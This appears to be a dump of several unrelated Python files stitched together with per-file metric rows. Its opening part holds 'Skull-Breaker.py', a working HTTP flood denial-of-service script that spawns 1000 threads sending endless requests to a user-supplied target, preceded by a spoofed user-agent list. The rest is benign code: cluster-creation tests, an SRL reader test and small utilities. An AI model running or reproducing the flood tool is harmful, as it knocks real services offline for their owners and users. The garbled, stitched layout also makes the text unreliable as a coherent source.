"Opera/9.26 (Macintosh; PPC Mac OS X; U; en)",
"Opera/9.26 (Windows NT 5.1; U; MEGAUPLOAD 2.0; en)"
"Mozilla/5.0 (compatible; ABrowse 0.4; Syllable)",
"Mozilla/5.0 (compatible; IBrowse 3.0; AmigaOS4.0)",
"Mozilla/5.0 (compatible; Konqueror/2.1.1; X11)",
"Mozilla/5.0 (compatible; Konqueror/2.1.2; X11)",
"Mozilla/5.0 (compatible; Konqueror/2.2-11; Linux)",
"Mozilla/5.0 (compatible; Konqueror/2.2-12; Linux)",
"Mozilla/5.0 (compatible; Konqueror/2.2.1; Linux)",
"Mozilla/5.0 (compatible; Konqueror/2.2.2)",
"Mozilla/5.0 (compatible; Konqueror/2.2.2-3; Linux)",
"Mozilla/5.0 (compatible; Konqueror/2.2.2; Linux 2.4.14-xfs; X11; i686)",
"Mozilla/5.0 (compatible; Konqueror/2.2.2; Linux)",
"Mozilla/5.0 (compatible; Konqueror/3.0-rc1; i686 Linux; 20020217)",
"Mozilla/5.0 (compatible; Konqueror/3.0-rc1; i686 Linux; 20020319)",
"Mozilla/5.0 (compatible; Konqueror/3.0-rc1; i686 Linux; 20020515)",
"Mozilla/5.0 (compatible; Konqueror/3.0-rc1; i686 Linux; 20020523)",
"Mozilla/5.0 (compatible; Konqueror/3.0-rc1; i686 Linux; 20020703)",
"Mozilla/5.0 (compatible; Konqueror/3.0-rc1; i686 Linux; 20020704)",
"Mozilla/5.0 (compatible; Konqueror/3.0-rc1; i686 Linux; 20020705)",
"Mozilla/5.0 (compatible; Konqueror/3.0-rc1; i686 Linux; 20020723)",
"Mozilla/5.0 (compatible; Konqueror/3.0-rc1; i686 Linux; 20020726)",
"Mozilla/5.0 (compatible; Konqueror/3.0-rc1; i686 Linux; 20020801)",
"Mozilla/5.0 (compatible; Konqueror/3.0-rc1; i686 Linux; 20020807)",
"Mozilla/5.0 (compatible; Konqueror/3.0-rc1; i686 Linux; 20020808)",
"Mozilla/5.0 (compatible; Konqueror/3.0-rc1; i686 Linux; 20020906)",
"Mozilla/5.0 (compatible; Konqueror/3.0-rc1; i686 Linux; 20020911)",
"Mozilla/5.0 (compatible; Konqueror/3.0-rc1; i686 Linux; 20020917)",
"Opera/9.80 (Windows NT 6.1; Opera Tablet/15165; U; en) Presto/2.8.149 Version/11.1",
"Opera/9.80 (Windows NT 6.1; U; cs) Presto/2.2.15 Version/10.00",
"Opera/9.80 (Windows NT 6.1; U; cs) Presto/2.7.62 Version/11.01",
"Opera/9.80 (Windows NT 6.1; U; de) Presto/2.2.15 Version/10.00",
"Opera/9.80 (Windows NT 6.1; U; de) Presto/2.2.15 Version/10.10",
"Opera/9.80 (Windows NT 6.1; U; en) Presto/2.2.15 Version/10.00",
"Opera/9.80 (Windows NT 6.1; U; en) Presto/2.5.22 Version/10.51",
"Opera/9.80 (Windows NT 6.1; U; en) Presto/2.6.30 Version/10.61",
"Opera/9.80 (Windows NT 6.1; U; en-GB) Presto/2.7.62 Version/11.00",
"Opera/9.80 (Windows NT 6.1; U; en-US) Presto/2.7.62 Version/11.01",
"Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00",
"Opera/9.80 (Windows NT 6.1; U; fi) Presto/2.2.15 Version/10.00",
"Opera/9.80 (Windows NT 6.1; U; fi) Presto/2.7.62 Version/11.00",
"Opera/9.80 (Windows NT 6.1; U; fr) Presto/2.5.24 Version/10.52",
"Opera/9.80 (Windows NT 6.1; U; ja) Presto/2.5.22 Version/10.50",
"Opera/9.80 (Windows NT 6.1; U; ko) Presto/2.7.62 Version/11.00",
"Opera/9.80 (Windows NT 6.1; U; pl) Presto/2.6.31 Version/10.70",
"Opera/9.80 (Windows NT 6.1; U; pl) Presto/2.7.62 Version/11.00",
"Opera/9.80 (Windows NT 6.1; U; sk) Presto/2.6.22 Version/10.50",
"Opera/9.80 (Windows NT 6.1; U; sv) Presto/2.7.62 Version/11.01",
"Opera/9.80 (Windows NT 6.1; U; zh-cn) Presto/2.2.15 Version/10.00",
"Opera/9.80 (Windows NT 6.1; U; zh-cn) Presto/2.5.22 Version/10.50",
"Opera/9.80 (Windows NT 6.1; U; zh-cn) Presto/2.6.30 Version/10.61",
"Opera/9.80 (Windows NT 6.1; U; zh-cn) Presto/2.6.37 Version/11.00",
"Opera/9.80 (Windows NT 6.1; U; zh-cn) Presto/2.7.62 Version/11.01",
"Opera/9.80 (Windows NT 6.1; U; zh-tw) Presto/2.5.22 Version/10.50",
"Opera/9.80 (Windows NT 6.1; U; zh-tw) Presto/2.7.62 Version/11.01",
"Opera/9.80 (Windows NT 6.1; WOW64; U; pt) Presto/2.10.229 Version/11.62",
"Opera/9.80 (X11; Linux i686; U; Debian; pl) Presto/2.2.15 Version/10.00",
"Opera/9.80 (X11; Linux i686; U; de) Presto/2.2.15 Version/10.00",
"Opera/9.80 (X11; Linux i686; U; en) Presto/2.2.15 Version/10.00",
"Opera/9.80 (X11; Linux i686; U; en) Presto/2.5.27 Version/10.60",
"Opera/9.80 (X11; Linux i686; U; en-GB) Presto/2.2.15 Version/10.00",
"Opera/9.80 (X11; Linux i686; U; en-GB) Presto/2.5.24 Version/10.53",
"Opera/9.80 (X11; Linux i686; U; pt-BR) Presto/2.2.15 Version/10.00",
"Opera/9.80 (X11; Linux i686; U; ru) Presto/2.2.15 Version/10.00",
"Opera/9.80 (X11; Linux i686; U; ru) Presto/2.8.131 Version/11.11",
"Opera/9.80 (X11; Linux x86_64; U; Ubuntu/10.10 (maverick); pl) Presto/2.7.62 Version/11.01",
"Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10",
"Opera/9.80 (X11; Linux x86_64; U; de) Presto/2.2.15 Version/10.00",
"Opera/9.80 (X11; Linux x86_64; U; en) Presto/2.2.15 Version/10.00",
"Opera/9.80 (X11; Linux x86_64; U; en-GB) Presto/2.2.15 Version/10.01",
"Opera/9.80 (X11; Linux x86_64; U; fr) Presto/2.9.168 Version/11.50",
"Opera/9.80 (X11; Linux x86_64; U; it) Presto/2.2.15 Version/10.10"
]
import socket, random, threading, time
print"""\033[92m
################################
hello there and welcome!!!
this is Chaotic Mind's property
so expect an exciting experience
for you with this Dos tool
Tool:
Skull-Breaker.py
Author:
Chaotic Mind
enjoy!!!!
################################ """
u=raw_input('\n\n TARGET:\n (www.example.com or IP)\n >')
p=input('\n PORT:\n >')
i=0
def k():
global i
i+=1
print'requests sent:', i
def so():
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((u,p))
s.send("GET /?{} HTTP/1.1\r\n".format(random.randint(0, 2000)).encode("utf-8"))
s.send("User-Agent: {}\r\n".format(random.choice(ua)).encode("utf-8"))
s.send("{}\r\n".format("Accept-language: en-US,en,q=0.5").encode("utf-8"))
k()
except socket.error as e:
pass
class HTTPThread(threading.Thread):
def run(self):
try:
while True:
so()
except Exception, ex:
pass
for x in range(1000):
t = HTTPThread()
t.start()
| 82.75 | 464 | 0.656103 | 6,251 | 31,114 | 3.246361 | 0.084147 | 0.026216 | 0.109545 | 0.054994 | 0.77337 | 0.744099 | 0.718869 | 0.686099 | 0.634652 | 0.599665 | 0 | 0.232788 | 0.148968 | 31,114 | 375 | 465 | 82.970667 | 0.533593 | 0 | 0 | 0.022039 | 0 | 0.785124 | 0.894453 | 0.003921 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.00551 | 0.002755 | null | null | 0.00551 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6a32643233a860a1ccdf7165adc2365e8c0ba993 | 115 | py | Python | bmds_server/common/utils.py | shapiromatron/bmds-server | 0b2b79b521728582fa66100621e9ea03e251f9f1 | [
"MIT"
] | 1 | 2019-07-09T16:42:15.000Z | 2019-07-09T16:42:15.000Z | bmds_server/common/utils.py | shapiromatron/bmds-server | 0b2b79b521728582fa66100621e9ea03e251f9f1 | [
"MIT"
] | 103 | 2016-11-14T15:58:53.000Z | 2022-03-07T21:01:03.000Z | bmds_server/common/utils.py | shapiromatron/bmds-server | 0b2b79b521728582fa66100621e9ea03e251f9f1 | [
"MIT"
] | 2 | 2017-03-17T20:43:22.000Z | 2018-01-04T19:15:18.000Z | from datetime import datetime
def to_timestamp(dt: datetime) -> str:
return dt.strftime("%Y-%b-%d %H:%m %Z")
| 19.166667 | 43 | 0.66087 | 19 | 115 | 3.947368 | 0.842105 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.165217 | 115 | 5 | 44 | 23 | 0.78125 | 0 | 0 | 0 | 0 | 0 | 0.147826 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
6a36b960765ee707d2c040682ade5ca9c6fb026a | 114 | py | Python | 0x01-python-if_else_loops_functions/9-print_last_digit.py | Trice254/alx-higher_level_programming | b49b7adaf2c3faa290b3652ad703914f8013c67c | [
"MIT"
] | null | null | null | 0x01-python-if_else_loops_functions/9-print_last_digit.py | Trice254/alx-higher_level_programming | b49b7adaf2c3faa290b3652ad703914f8013c67c | [
"MIT"
] | null | null | null | 0x01-python-if_else_loops_functions/9-print_last_digit.py | Trice254/alx-higher_level_programming | b49b7adaf2c3faa290b3652ad703914f8013c67c | [
"MIT"
] | null | null | null | #!/usr/bin/python3
def print_last_digit(number):
print(abs(number) % 10, end='')
return(abs(number) % 10)
| 22.8 | 35 | 0.649123 | 17 | 114 | 4.235294 | 0.705882 | 0.25 | 0.305556 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.052083 | 0.157895 | 114 | 4 | 36 | 28.5 | 0.697917 | 0.149123 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0 | 0 | 0.333333 | 0.666667 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
dbecdd1e1dcf7de09c07b464cba5f458775c50e0 | 61 | py | Python | dashboard/signals.py | astrid-project/security-dashboard | 0690e017238171899745eacc89f89cf61d8efecc | [
"Apache-2.0"
] | 1 | 2020-10-14T19:50:32.000Z | 2020-10-14T19:50:32.000Z | dashboard/signals.py | astrid-project/security-dashboard | 0690e017238171899745eacc89f89cf61d8efecc | [
"Apache-2.0"
] | null | null | null | dashboard/signals.py | astrid-project/security-dashboard | 0690e017238171899745eacc89f89cf61d8efecc | [
"Apache-2.0"
] | 1 | 2021-07-07T14:20:34.000Z | 2021-07-07T14:20:34.000Z | import django.dispatch
from django.dispatch import receiver
| 15.25 | 36 | 0.852459 | 8 | 61 | 6.5 | 0.625 | 0.538462 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.114754 | 61 | 3 | 37 | 20.333333 | 0.962963 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
e04ef9631d3f76955c5c752ac88943d22503ef3f | 135 | py | Python | default/{{cookiecutter.project_short_name}}/tests/test_model.py | timtroendle/cookiecutter-reproducible-science | 6f59375e6bbe025bb46ddc8c6b16c348b649a8ed | [
"MIT"
] | 9 | 2018-12-20T22:02:37.000Z | 2022-02-20T19:27:53.000Z | default/{{cookiecutter.project_short_name}}/tests/test_model.py | timtroendle/cookiecutter-reproducible-science | 6f59375e6bbe025bb46ddc8c6b16c348b649a8ed | [
"MIT"
] | 4 | 2020-10-12T07:47:08.000Z | 2021-05-27T08:10:10.000Z | default/{{cookiecutter.project_short_name}}/tests/test_model.py | timtroendle/cookiecutter-reproducible-science | 6f59375e6bbe025bb46ddc8c6b16c348b649a8ed | [
"MIT"
] | null | null | null | """Test case for the model."""
import scripts.model
def test_model():
assert scripts.model.linear_model(slope=1, x0=4, x=0) == 4
| 19.285714 | 62 | 0.681481 | 23 | 135 | 3.913043 | 0.695652 | 0.266667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.04386 | 0.155556 | 135 | 6 | 63 | 22.5 | 0.745614 | 0.177778 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
e05128dd3aa67e7284d319b7bda8bfde7c03f3c9 | 12,789 | py | Python | tests/test_clusterv22.py | aditya-dhage/qds-sdk-py | b84036e3b666065cb1832d590d38863d0bfeee30 | [
"Apache-2.0"
] | null | null | null | tests/test_clusterv22.py | aditya-dhage/qds-sdk-py | b84036e3b666065cb1832d590d38863d0bfeee30 | [
"Apache-2.0"
] | null | null | null | tests/test_clusterv22.py | aditya-dhage/qds-sdk-py | b84036e3b666065cb1832d590d38863d0bfeee30 | [
"Apache-2.0"
] | null | null | null | from __future__ import print_function
import sys
import os
if sys.version_info > (2, 7, 0):
import unittest
else:
import unittest2 as unittest
from mock import Mock, ANY
import tempfile
sys.path.append(os.path.join(os.path.dirname(__file__), '../bin'))
import qds
from qds_sdk.connection import Connection
from test_base import print_command
from test_base import QdsCliTestCase
from qds_sdk.cloud.cloud import Cloud
from qds_sdk.qubole import Qubole
class TestClusterCreate(QdsCliTestCase):
# default cluster composition
def test_cluster_info(self):
sys.argv = ['qds.py', '--version', 'v2.2', 'cluster', 'create', '--label', 'test_label',
'--compute-access-key', 'aki', '--compute-secret-key', 'sak', '--min-nodes', '3',
'--max-nodes', '5', '--disallow-cluster-termination', '--enable-ganglia-monitoring',
'--node-bootstrap-file', 'test_file_name', '--master-instance-type',
'm1.xlarge', '--slave-instance-type', 'm1.large', '--encrypted-ephemerals']
Qubole.cloud = None
print_command()
Connection._api_call = Mock(return_value={})
qds.main()
Connection._api_call.assert_called_with('POST', 'clusters', {
'cloud_config': {'compute_config': {'compute_secret_key': 'sak', 'compute_access_key': 'aki'}},
'monitoring': {'ganglia': True},
'cluster_info': {'master_instance_type': 'm1.xlarge', 'node_bootstrap': 'test_file_name',
'slave_instance_type': 'm1.large', 'label': ['test_label'],
'disallow_cluster_termination': True, 'max_nodes': 5, 'min_nodes': 3,
'composition': {'min_nodes': {'nodes': [{'percentage': 100, 'type': 'ondemand'}]},
'master': {'nodes': [{'percentage': 100, 'type': 'ondemand'}]},
'autoscaling_nodes': {'nodes': [{'percentage': 50, 'type': 'ondemand'},
{'timeout_for_request': 1,
'percentage': 50, 'type': 'spot',
'fallback': 'ondemand',
'maximum_bid_price_percentage': 100}]}},
'datadisk': {'encryption': True}}})
def test_od_od_od(self):
sys.argv = ['qds.py', '--version', 'v2.2', 'cluster', 'create', '--label', 'test_label',
'--master-type', 'ondemand', '--min-ondemand-percentage', '100',
'--autoscaling-ondemand-percentage', '100']
Qubole.cloud = None
print_command()
Connection._api_call = Mock(return_value={})
qds.main()
Connection._api_call.assert_called_with('POST', 'clusters', {'cluster_info': {
'composition': {'min_nodes': {'nodes': [{'percentage': 100, 'type': 'ondemand'}]},
'master': {'nodes': [{'percentage': 100, 'type': 'ondemand'}]},
'autoscaling_nodes': {'nodes': [{'percentage': 100, 'type': 'ondemand'}]}},
'label': ['test_label']}})
def test_od_od_odspot(self):
sys.argv = ['qds.py', '--version', 'v2.2', 'cluster', 'create', '--label', 'test_label',
'--master-type', 'ondemand', '--min-ondemand-percentage', '100',
'--autoscaling-ondemand-percentage',
'50', '--autoscaling-spot-percentage', '50', '--autoscaling-maximum-bid-price-percentage', '50',
'--autoscaling-timeout-for-request', '3', '--autoscaling-spot-fallback', 'ondemand']
Qubole.cloud = None
print_command()
Connection._api_call = Mock(return_value={})
qds.main()
Connection._api_call.assert_called_with('POST', 'clusters', {'cluster_info': {
'composition': {'min_nodes': {'nodes': [{'percentage': 100, 'type': 'ondemand'}]},
'master': {'nodes': [{'percentage': 100, 'type': 'ondemand'}]}, 'autoscaling_nodes': {
'nodes': [{'percentage': 50, 'type': 'ondemand'},
{'timeout_for_request': 3, 'percentage': 50, 'type': 'spot', 'fallback': 'ondemand',
'maximum_bid_price_percentage': 50}]}}, 'label': ['test_label']}})
def test_od_od_odspot_nofallback(self):
sys.argv = ['qds.py', '--version', 'v2.2', 'cluster', 'create', '--label', 'test_label',
'--master-type', 'ondemand', '--min-ondemand-percentage', '100',
'--autoscaling-ondemand-percentage',
'50', '--autoscaling-spot-percentage', '50', '--autoscaling-maximum-bid-price-percentage', '50',
'--autoscaling-timeout-for-request', '3', '--autoscaling-spot-fallback', None]
Qubole.cloud = None
print_command()
Connection._api_call = Mock(return_value={})
qds.main()
Connection._api_call.assert_called_with('POST', 'clusters', {'cluster_info': {
'composition': {'min_nodes': {'nodes': [{'percentage': 100, 'type': 'ondemand'}]},
'master': {'nodes': [{'percentage': 100, 'type': 'ondemand'}]}, 'autoscaling_nodes': {
'nodes': [{'percentage': 50, 'type': 'ondemand'},
{'timeout_for_request': 3, 'percentage': 50, 'type': 'spot', 'fallback': None,
'maximum_bid_price_percentage': 50}]}}, 'label': ['test_label']}})
def test_od_od_spotblock(self):
sys.argv = ['qds.py', '--version', 'v2.2', 'cluster', 'create', '--label', 'test_label',
'--master-type', 'ondemand', '--min-ondemand-percentage', '100',
'--autoscaling-spot-block-percentage',
'100', '--autoscaling-spot-block-duration', '60']
Qubole.cloud = None
print_command()
Connection._api_call = Mock(return_value={})
qds.main()
Connection._api_call.assert_called_with('POST', 'clusters', {'cluster_info': {
'composition': {'min_nodes': {'nodes': [{'percentage': 100, 'type': 'ondemand'}]},
'master': {'nodes': [{'percentage': 100, 'type': 'ondemand'}]},
'autoscaling_nodes': {'nodes': [{'percentage': 100, 'type': 'spotblock', 'timeout': 60}]}},
'label': ['test_label']}})
def test_od_od_spotblockspot(self):
sys.argv = ['qds.py', '--version', 'v2.2', 'cluster', 'create', '--label', 'test_label',
'--master-type', 'ondemand', '--min-ondemand-percentage', '100',
'--autoscaling-spot-block-percentage',
'50', '--autoscaling-spot-block-duration', '60', '--autoscaling-spot-percentage', '50',
'--autoscaling-maximum-bid-price-percentage', '50',
'--autoscaling-timeout-for-request', '3', '--autoscaling-spot-fallback', None]
Qubole.cloud = None
print_command()
Connection._api_call = Mock(return_value={})
qds.main()
Connection._api_call.assert_called_with('POST', 'clusters', {'cluster_info': {
'composition': {'min_nodes': {'nodes': [{'percentage': 100, 'type': 'ondemand'}]},
'master': {'nodes': [{'percentage': 100, 'type': 'ondemand'}]}, 'autoscaling_nodes': {
'nodes': [{'percentage': 50, 'type': 'spotblock', 'timeout': 60},
{'timeout_for_request': 3, 'percentage': 50, 'type': 'spot', 'fallback': None,
'maximum_bid_price_percentage': 50}]}}, 'label': ['test_label']}})
def test_od_od_spot(self):
sys.argv = ['qds.py', '--version', 'v2.2', 'cluster', 'create', '--label', 'test_label',
'--master-type', 'ondemand', '--min-ondemand-percentage', '100', '--autoscaling-spot-percentage',
'100',
'--autoscaling-maximum-bid-price-percentage', '50', '--autoscaling-timeout-for-request', '3',
'--autoscaling-spot-fallback', None]
Qubole.cloud = None
print_command()
Connection._api_call = Mock(return_value={})
qds.main()
Connection._api_call.assert_called_with('POST', 'clusters', {'cluster_info': {
'composition': {'min_nodes': {'nodes': [{'percentage': 100, 'type': 'ondemand'}]},
'master': {'nodes': [{'percentage': 100, 'type': 'ondemand'}]}, 'autoscaling_nodes': {
'nodes': [{'timeout_for_request': 3, 'percentage': 100, 'type': 'spot', 'fallback': None,
'maximum_bid_price_percentage': 50}]}}, 'label': ['test_label']}})
def test_od_spot_spot(self):
sys.argv = ['qds.py', '--version', 'v2.2', 'cluster', 'create', '--label', 'test_label',
'--master-type', 'ondemand', '--min-spot-percentage', '100',
'--min-maximum-bid-price-percentage', '50', '--min-timeout-for-request', '3',
'--min-spot-fallback', None, '--autoscaling-spot-percentage', '100',
'--autoscaling-maximum-bid-price-percentage', '50', '--autoscaling-timeout-for-request', '3',
'--autoscaling-spot-fallback', None]
Qubole.cloud = None
print_command()
Connection._api_call = Mock(return_value={})
qds.main()
Connection._api_call.assert_called_with('POST', 'clusters', {'cluster_info': {'composition': {'min_nodes': {
'nodes': [{'timeout_for_request': 3, 'percentage': 100, 'type': 'spot', 'fallback': None,
'maximum_bid_price_percentage': 50}]}, 'master': {
'nodes': [{'percentage': 100, 'type': 'ondemand'}]}, 'autoscaling_nodes': {'nodes': [
{'timeout_for_request': 3, 'percentage': 100, 'type': 'spot', 'fallback': None,
'maximum_bid_price_percentage': 50}]}}, 'label': ['test_label']}})
def test_spotblock_spotblock_spotblock(self):
sys.argv = ['qds.py', '--version', 'v2.2', 'cluster', 'create', '--label', 'test_label',
'--master-type', 'spotblock', '--master-spot-block-duration', '60', '--min-spot-block-percentage',
'100', '--min-spot-block-duration', '60', '--autoscaling-spot-block-percentage',
'100', '--autoscaling-spot-block-duration', '60']
Qubole.cloud = None
print_command()
Connection._api_call = Mock(return_value={})
qds.main()
Connection._api_call.assert_called_with('POST', 'clusters', {'cluster_info': {
'composition': {'min_nodes': {'nodes': [{'percentage': 100, 'type': 'spotblock', 'timeout': 60}]},
'master': {'nodes': [{'percentage': 100, 'type': 'spotblock', 'timeout': 60}]},
'autoscaling_nodes': {'nodes': [{'percentage': 100, 'type': 'spotblock', 'timeout': 60}]}},
'label': ['test_label']}})
def test_spot_spot_spot(self):
sys.argv = ['qds.py', '--version', 'v2.2', 'cluster', 'create', '--label', 'test_label',
'--master-type', 'spot', '--master-maximum-bid-price-percentage', '50',
'--master-timeout-for-request', '3',
'--master-spot-fallback', None, '--min-spot-percentage', '100',
'--min-maximum-bid-price-percentage', '50', '--min-timeout-for-request', '3',
'--min-spot-fallback', None, '--autoscaling-spot-percentage', '100',
'--autoscaling-maximum-bid-price-percentage', '50', '--autoscaling-timeout-for-request', '3',
'--autoscaling-spot-fallback', None]
Qubole.cloud = None
print_command()
Connection._api_call = Mock(return_value={})
qds.main()
Connection._api_call.assert_called_with('POST', 'clusters', {'cluster_info': {'composition': {'min_nodes': {
'nodes': [{'timeout_for_request': 3, 'percentage': 100, 'type': 'spot', 'fallback': None,
'maximum_bid_price_percentage': 50}]}, 'master': {'nodes': [
{'timeout_for_request': 3, 'percentage': 100, 'type': 'spot', 'fallback': None,
'maximum_bid_price_percentage': 50}]}, 'autoscaling_nodes': {'nodes': [
{'timeout_for_request': 3, 'percentage': 100, 'type': 'spot', 'fallback': None,
'maximum_bid_price_percentage': 50}]}}, 'label': ['test_label']}})
| 64.590909 | 119 | 0.533505 | 1,221 | 12,789 | 5.387387 | 0.091728 | 0.083004 | 0.067194 | 0.06689 | 0.849194 | 0.831408 | 0.819398 | 0.812709 | 0.804348 | 0.804348 | 0 | 0.028177 | 0.275706 | 12,789 | 197 | 120 | 64.918782 | 0.68196 | 0.002111 | 0 | 0.650273 | 0 | 0 | 0.403527 | 0.158072 | 0 | 0 | 0 | 0 | 0.054645 | 1 | 0.054645 | false | 0 | 0.071038 | 0 | 0.131148 | 0.065574 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
e052b4251c3258e4a63d87436c9ee50db2657848 | 150 | py | Python | WeboscketWrapper_JE/je_websocket/webscoket_core/__init__.py | JE-Chen/je_old_repo | a8b2f1ac2eec25758bd15b71c64b59b27e0bcda5 | [
"MIT"
] | 2 | 2020-11-27T07:18:23.000Z | 2020-12-30T06:37:21.000Z | WeboscketWrapper_JE/je_websocket/webscoket_core/__init__.py | JE-Chen/je_old_repo | a8b2f1ac2eec25758bd15b71c64b59b27e0bcda5 | [
"MIT"
] | 2 | 2020-11-27T17:19:35.000Z | 2020-11-27T20:29:37.000Z | WeboscketWrapper_JE/je_websocket/webscoket_core/__init__.py | JE-Chen/je_old_repo | a8b2f1ac2eec25758bd15b71c64b59b27e0bcda5 | [
"MIT"
] | null | null | null | from je_websocket.webscoket_core.websocket_client import websocket_client
from je_websocket.webscoket_core.websocket_server import websocket_server
| 50 | 74 | 0.906667 | 20 | 150 | 6.4 | 0.4 | 0.09375 | 0.234375 | 0.375 | 0.578125 | 0.578125 | 0 | 0 | 0 | 0 | 0 | 0 | 0.066667 | 150 | 2 | 75 | 75 | 0.914286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
1623394ad6069c4b30a16a2cf9c147aafb3b9e12 | 4,235 | py | Python | allennlp/tests/data/dataset_readers/srl_dataset_reader_test.py | schmmd/allennlp | fbc28cefe03b1ea3ff65300d475d34f5f9629a5c | [
"Apache-2.0"
] | 17 | 2019-11-19T19:02:35.000Z | 2021-11-16T16:19:07.000Z | allennlp/tests/data/dataset_readers/srl_dataset_reader_test.py | schmmd/allennlp | fbc28cefe03b1ea3ff65300d475d34f5f9629a5c | [
"Apache-2.0"
] | 1 | 2021-05-31T11:12:02.000Z | 2021-06-01T05:34:27.000Z | allennlp/tests/data/dataset_readers/srl_dataset_reader_test.py | schmmd/allennlp | fbc28cefe03b1ea3ff65300d475d34f5f9629a5c | [
"Apache-2.0"
] | 10 | 2019-12-06T11:32:37.000Z | 2022-01-06T15:39:09.000Z | # pylint: disable=no-self-use,invalid-name
import pytest
from allennlp.data.dataset_readers.semantic_role_labeling import SrlReader
from allennlp.common.util import ensure_list
from allennlp.common.testing import AllenNlpTestCase
class TestSrlReader:
@pytest.mark.parametrize("lazy", (True, False))
def test_read_from_file(self, lazy):
conll_reader = SrlReader(lazy=lazy)
instances = conll_reader.read(AllenNlpTestCase.FIXTURES_ROOT / 'conll_2012' / 'subdomain')
instances = ensure_list(instances)
fields = instances[0].fields
tokens = [t.text for t in fields['tokens'].tokens]
assert tokens == ["Mali", "government", "officials", "say", "the", "woman", "'s",
"confession", "was", "forced", "."]
assert fields["verb_indicator"].labels[3] == 1
assert fields["tags"].labels == ['B-ARG0', 'I-ARG0', 'I-ARG0', 'B-V', 'B-ARG1',
'I-ARG1', 'I-ARG1', 'I-ARG1', 'I-ARG1', 'I-ARG1', 'O']
assert fields["metadata"].metadata["words"] == tokens
assert fields["metadata"].metadata["verb"] == tokens[3]
assert fields["metadata"].metadata["gold_tags"] == fields["tags"].labels
fields = instances[1].fields
tokens = [t.text for t in fields['tokens'].tokens]
assert tokens == ["Mali", "government", "officials", "say", "the", "woman", "'s",
"confession", "was", "forced", "."]
assert fields["verb_indicator"].labels[8] == 1
assert fields["tags"].labels == ['O', 'O', 'O', 'O', 'B-ARG1', 'I-ARG1',
'I-ARG1', 'I-ARG1', 'B-V', 'B-ARG2', 'O']
assert fields["metadata"].metadata["words"] == tokens
assert fields["metadata"].metadata["verb"] == tokens[8]
assert fields["metadata"].metadata["gold_tags"] == fields["tags"].labels
fields = instances[2].fields
tokens = [t.text for t in fields['tokens'].tokens]
assert tokens == ['The', 'prosecution', 'rested', 'its', 'case', 'last', 'month', 'after',
'four', 'months', 'of', 'hearings', '.']
assert fields["verb_indicator"].labels[2] == 1
assert fields["tags"].labels == ['B-ARG0', 'I-ARG0', 'B-V', 'B-ARG1', 'I-ARG1', 'B-ARGM-TMP',
'I-ARGM-TMP', 'B-ARGM-TMP', 'I-ARGM-TMP', 'I-ARGM-TMP',
'I-ARGM-TMP', 'I-ARGM-TMP', 'O']
assert fields["metadata"].metadata["words"] == tokens
assert fields["metadata"].metadata["verb"] == tokens[2]
assert fields["metadata"].metadata["gold_tags"] == fields["tags"].labels
fields = instances[3].fields
tokens = [t.text for t in fields['tokens'].tokens]
assert tokens == ['The', 'prosecution', 'rested', 'its', 'case', 'last', 'month', 'after',
'four', 'months', 'of', 'hearings', '.']
assert fields["verb_indicator"].labels[11] == 1
